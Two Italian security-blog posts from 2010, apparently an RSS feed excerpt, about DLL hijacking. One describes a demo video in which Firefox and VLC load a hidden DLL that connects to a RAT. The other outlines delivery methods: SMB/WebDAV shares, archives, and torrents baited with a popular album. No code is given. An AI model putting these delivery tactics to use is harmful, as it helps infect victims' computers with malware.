		<description><![CDATA[Grazie al nostro lettore Frank siamo in grado di dimostrarvi tramite un bellissimo video l&#8217;esecuzione dell&#8217;exploit DLL Hijack. Il video si scompone principalmente in due parti, nel primo caso viene eseguito un semplice file .html associato al Browser Mozilla Firefox che al lancio richiama una DLL invisibile contenente un malware che infetterà il pc rendendolo [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><p><a href="http://www.oversecurity.net/2010/09/06/dll-hijack-video-dimostrativo/"><em>Clicca qui per vedere il video incorporato.</em></a></p></p>
<p style="text-align: left;">Grazie al nostro lettore Frank siamo in grado di dimostrarvi tramite un bellissimo video l&#8217;esecuzione dell&#8217;exploit DLL Hijack.</p>
<p style="text-align: left;">Il video si scompone principalmente in due parti, nel primo caso viene eseguito un semplice file .html associato al Browser Mozilla Firefox che al lancio richiama una DLL invisibile contenente un malware che infetterà il pc rendendolo un client e collegandosi al server RAT schwarze sonne, prendendo così pieno possesso del PC della vittima.</p>
<p style="text-align: left;">Importante notare in questa prima parte del video due dettagli:</p>
<ul>
<li>Viene usata l&#8217;ultima versione di Mozilla Firefox (3.6.8); ancora oggi dopo circa 20gg dal ritrovamento di tale falla non è stata rilasciata una versione del Browser che risolva la problematica.</li>
<li>La DLL è stata resa invisibile, di default nessun sistema Windows rende visibili i file nascosti; questa caratteristica rende ancora più vulnerabile il pc della vittima.</li>
</ul>
<p>Nella seconda parte del video viene sfruttata la medesima tecnica però cambiando il software di &#8220;lancio&#8221; della DLL sfruttando il lettore multimediale VLC.</p>
<p style="text-align: center;">
<p style="text-align: center;">
]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2010/09/06/dll-hijack-video-dimostrativo/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Exploiting DLL Hijack, esempi reali!</title>
		<link>http://www.oversecurity.net/2010/09/04/exploiting-dll-hijack-esempi-reali/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=exploiting-dll-hijack-esempi-reali</link>
		<comments>http://www.oversecurity.net/2010/09/04/exploiting-dll-hijack-esempi-reali/#comments</comments>
		<pubDate>Sat, 04 Sep 2010 10:51:41 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Articoli Tecnici]]></category>
		<category><![CDATA[Bruno Filipe]]></category>
		<category><![CDATA[dll]]></category>
		<category><![CDATA[dll hijack]]></category>
		<category><![CDATA[DLL Load Hijacking]]></category>
		<category><![CDATA[Hijacking]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[SMB]]></category>
		<category><![CDATA[Torrent]]></category>
		<category><![CDATA[Trojan]]></category>
		<category><![CDATA[Webdav]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=1439</guid>
		<description><![CDATA[Lo scorso Agosto vi avevo introdotto la nuova tecnica di DLL Hikacking in questo articolo, ma stanotte mi sono imbattuto in un interessante articolo di Bruno Filipe che dimostra come può essere sfruttata tale tecnica nella realtà! Utilizzando una cartella condivisa su un server SMB / WebDav Questa è forse la tecnica più comune di [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.oversecurity.net/wp-content/uploads/2010/08/dll_logo.png" rel="lightbox[1439]" title="dll_logo"><img class="aligncenter size-full wp-image-1397" title="dll_logo" src="http://www.oversecurity.net/wp-content/uploads/2010/08/dll_logo.png" alt="" width="256" height="256" /></a>Lo scorso Agosto vi avevo introdotto la nuova tecnica di DLL Hikacking in questo <a href="http://www.oversecurity.net/2010/08/25/analisi-del-dll-load-hijacking/" target="_blank">articolo</a>, ma stanotte mi sono imbattuto in un interessante <a href="http://digitalacropolis.us/?p=113" target="_blank">articolo</a> di Bruno Filipe che dimostra come può essere sfruttata tale tecnica nella realtà!</p>
<p><strong>Utilizzando una cartella condivisa su un server SMB / WebDav</strong></p>
<p>Questa è forse la tecnica più comune di come il dll hijack  viene sfruttato, sicuramente perché può essere sfruttata da remoto.  Esiste già un modulo per Metasploit che utilizza questa tecnica. Esso prevede l&#8217;inserimento in una cartella condivisa di una DLL infetta e di un file pulito con l&#8217;obbiettivo di far aprire al target il file pulito. All&#8217;appertura del file pulito realmente viene caricata la DLL infetta che procede ad installare un malware/trojan sul PC della vittima.</p>
<p><strong>Un archivio compresso (. zip, . tar.gz, . rar, ecc ecc)</strong></p>
<p>Questa tecnica prevede l&#8217;inserimento in un archivio di un gruppo di file più una DLL, l&#8217;obbiettivo sarà quello di far estrarre l&#8217;intero contenuto dell&#8217;archivio e procedere all&#8217;appertura di un file &#8220;pulito&#8221; che provvederà a richiamare la DLL infetta contenuta nell&#8217;archivio.</p>
<p><strong>Torrent</strong></p>
<p>Sicuramentr questa tecnica ha il vantaggio di avere una diffusione su grande scala pertanto è da considerarsi veramente dannosa, il principio si basa sulla precedente tecnica dell&#8217;archivio ma grazie alla difffusione dei Torrent e di un minimo di Social Engineering sarà possibile ottenere un grande numero di bersagli.</p>
<p>Ipotizziamo di distribuire sul canale Torrent l&#8217;ultimo album di Shakira (sicuramente richiestissimo), ovviamente l&#8217;archivio non conterrà esclusivamente l&#8217;album ma anche la DLL infetta. L&#8217;utente una volta completato il download dell&#8217;ablum provvederà ad estrarlo ed ad ascoltare l&#8217;album&#8230;ed ecco che viene caricata la DLL.</p>
<p><strong>Multi Exploiting DLL Hijack</strong></p>
<p>Questa tecnica prevede l&#8217;inserimento di più DLL infette all&#8217;interno di una risorsa condivisa, un archivio o un torrent in modo da aumentare notevolmente le possibilità di attaccare la vittima.</p>
<p>Prendendo spunto dal precedente esempio dell&#8217;album di Shakira non possiamo avere una certezza di quale player multimediale utilizza la vittima per riprodurre gli mp3 per cui inseriremo all&#8217;interno dell&#8217;archivio contenente l&#8217;album più DLL infette (ognuna per ogni lettore multimediale) dandoci così la possibilità di incrementare il buon esito dell&#8217;attacco.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2010/09/04/exploiting-dll-hijack-esempi-reali/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

